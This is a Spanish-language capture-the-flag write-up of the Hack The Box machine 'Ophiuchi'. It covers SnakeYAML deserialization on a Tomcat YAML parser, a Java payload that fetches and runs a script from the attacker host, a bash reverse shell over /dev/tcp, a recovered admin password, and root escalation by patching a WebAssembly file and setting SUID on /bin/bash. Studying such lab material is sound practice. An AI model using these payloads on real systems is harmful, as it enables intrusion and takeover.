# Ophiuchi

**OS**: Linux \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen
- SnakeYAML Deserilization
- SnakeYAML deserialization Gadget
- Wasmer
- Hijacking WebAssembly
- wasm2wat
- wat2wasm

## Nmap Scan

`nmap -p- -sV -sC 10.10.10.227`

```
Nmap scan report for 10.10.10.227
Host is up (0.064s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
|   256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_  256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.38
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

En el puerto 8080 encontramos la función **Online YAML Parser**, si le mandamos cualquier texto nos regresa que la función está deshabilitada.

![1](img/1.png)

![2](img/2.png)

### SnakeYAML Deserilization

Investigando sobre vulnerabilidades relacionadas llegamos a este [blog](https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858) que nos explica como podemos explotar esta función.

Ponemos a la escucha nuestro servidor web con python y mandamos el siguiente script.

```
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.33/"]
  ]]
]
```

![3](img/3.png)

Recibimos correctamente una petición en nuestro servidor.

![4](img/4.png)

### SnakeYAML deserialization Gadget

Ahora que sabemos que está funcionando correctamente utilizaremos el siguiente [repositorio](https://github.com/artsploit/yaml-payload) para crear nuestro payload y obtener una reverse shell.

Descargamos el repositorio y modificamos el archivo **AwesomeScriptEngineFactory.java** con lo siguiente.

##### AwesomeScriptEngineFactory.java
```java
    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("curl http://10.10.14.33/doom.sh -o /tmp/doom.sh");
            Runtime.getRuntime().exec("bash /tmp/doom.sh");

        } catch (IOException e) {
            e.printStackTrace();
        }
    }
```

Compilamos el proyecto y lo empaquetamos en un jar.

- `javac src/artsploit/AwesomeScriptEngineFactory.java`
- `jar -cvf yaml-payload.jar -C src/ .`
- `mv yaml-payload.jar ../`

![5](img/5.png)

Creamos nuestro archivo que contendrá la reverse shell y levantamos nuestro servidor web.

- `echo '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.33/1234 0>&1' > doom.sh`
- `python3 -m http.server 80`

![6](img/6.png)

Mandamos el siguiente script para ejecutar nuestro payload.

```
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.33/yaml-payload.jar"]
  ]]
]
```

![7](img/7.png)

![8](img/8.png)

## Escalada de Privilegios (User)

Enumerando los archivos de Tomcat encontramos el password del usuario **admin**.

`cat /opt/tomcat/conf/tomcat-users.xml | grep admin`

![9](img/9.png)

```
admin : whythereisalimit
```

Nos conectamos por SSH.

`ssh admin@10.10.10.227`

![10](img/10.png)

## Escalada de Privilegios (Root)

Vemos que el usuario puede ejecutar el comando **/usr/bin/go run /opt/wasm-functions/index.go** como sudo.

`sudo -l`

![11](img/11.png)

Inspeccionando el archivo **index.go** encontramos que hace uso de **wasmer** y manda a llamar el archivo **main.wasm**

`cat /opt/wasm-functions/index.go`

![12](img/12.png)

Si ejecutamos el comando nos arroja un error, si copiamos el archivo **main.wasm** en la ruta donde nos encontramos y ejecutamos el comando no regresara el texto **Not ready to deploy**.

- `sudo /usr/bin/go run /opt/wasm-functions/index.go`
- `cp /opt/wasm-functions/main.wasm .`

![13](img/13.png)

### Hijacking WebAssembly

Si vemos el script el valor de **info** debe ser 1 para poder ejecutar el script **deploy.sh**. Nos copiaremos el archivo **main.wasm** para modificar el valor.

`scp admin@10.10.10.227:/opt/wasm-functions/main.wasm .`

![14](img/14.png)

Y con la siguiente herramienta [wasm2wat](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) podemos descompilar el archivo.

![15](img/15.png)

Modificamos el valor **(i32.const 0))** por **(i32.const 1))** y lo compilamos con [wat2wasm](https://webassembly.github.io/wabt/demo/wat2wasm/index.html).

![16](img/16.png)

Descargamos el archivo modificado, lo subimos a la máquina y si ejecutamos el comando vemos que nos regresa la respuesta correcta.

- `scp test.wasm admin@10.10.10.227:/tmp/main.wasm`
- `cd /tmp`
- `sudo /usr/bin/go run /opt/wasm-functions/index.go`

![17](img/17.png)

Ahora solo creamos el archivo **deploy.sh** con nuestro comando.

- `echo "chmod +s /bin/bash" > deploy.sh`
- `sudo /usr/bin/go run /opt/wasm-functions/index.go`
- `/bin/bash -p`

![18](img/18.png)

## Referencias
https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858 \
https://github.com/artsploit/yaml-payload \
https://webassembly.github.io/wabt/demo/wasm2wat/index.html \
https://webassembly.github.io/wabt/demo/wat2wasm/index.html